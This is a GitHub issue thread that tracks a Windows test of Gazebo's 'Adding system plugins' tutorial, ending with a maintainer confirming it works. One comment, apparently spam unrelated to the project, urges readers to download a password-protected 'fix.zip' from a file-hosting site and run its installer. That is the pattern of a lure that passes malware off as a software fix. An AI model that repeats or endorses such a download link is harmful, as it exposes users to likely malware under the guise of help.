gazebosim/gazebo_test_cases #1123: gz-sim: Adding system plugins

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/sim/9/adding_system_plugins.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/adding_system_plugins.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Axolot5784, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

knmcguire, 2024-09-13:
I'm now on this with windows 11

knmcguire, 2024-09-13:
✅ This all works good considering I apply the fix of https://github.com/gazebosim/gazebo_test_cases/issues/1126 for windows. 

[image]

closed 2024-09-13 by azeey